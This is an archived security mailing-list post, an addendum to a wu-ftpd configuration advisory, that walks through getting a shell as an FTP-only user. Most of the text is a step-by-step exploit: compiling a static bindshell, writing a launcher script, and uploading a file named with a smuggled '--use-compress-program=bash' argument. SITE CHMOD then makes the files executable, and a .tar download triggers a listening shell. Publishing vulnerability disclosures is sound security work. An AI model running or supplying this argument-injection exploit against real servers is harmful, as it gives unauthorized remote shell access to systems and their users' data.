Good evening all, I have noticed that in my original Bugtraq posting/paper I mentioned the possibility of executing arbitrary code if you actually have a valid FTP only account on a system, but did not include specific info on this. I realise now that this information is more relevant than the anonymous FTP exploit as it is the default configuration and many, many people give users accounts on this kind of setup believing it to be `secure'. Please find below an addendum to my paper (http://www.suid.kg/advisories/001.txt) You can find this on the web with the rest of my stuff at the new location http://www.suid.kg/ . Merry Xmas, suidat_private --- suidat_private - an addendum to wu-ftpd configuration vulnerability exploit information Background: In the initial advisory I mentioned that users with valid ftp access only accounts may also execute arbitrary code. I did not however include exploit information for this. This information is now found below. Exploit Information: With a valid FTP account only the server, the difficulty goes right down. You also have the added benefit of not being stuck in a chroot() environment at the end (by default). Local exploit time. The exploit goes along much the same lines as the anonymous FTP exploit does: Create a backdoor, using bindshell from our previous example: $ gcc bindshell.c -o b -static If you can perform a SITE CHMOD (default for normal non-anon users on wu-ftpd), then you can use the following script example. Create a script to exec the desired commands: $ cat > blah #!/bin/bash ./b & ^D Now create empty file "--use-compress-program=bash blah" $ > "--use-compress-program=bash blah" FTP to your target, login with your username/password. Upload your 3 files: ftp> put b ftp> put blah ftp> put "--use-compress-program=bash blah" Do a SITE CHMOD for b and blah: ftp> quote SITE CHMOD 0755 b ftp> quote SITE CHMOD 0755 blah Now get your file: ftp> get "--use-compress-program=bash blah".tar Thats all there is to it. You now should have a shell on whatever port you specified. Merry Xmas!
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:22:14 PDT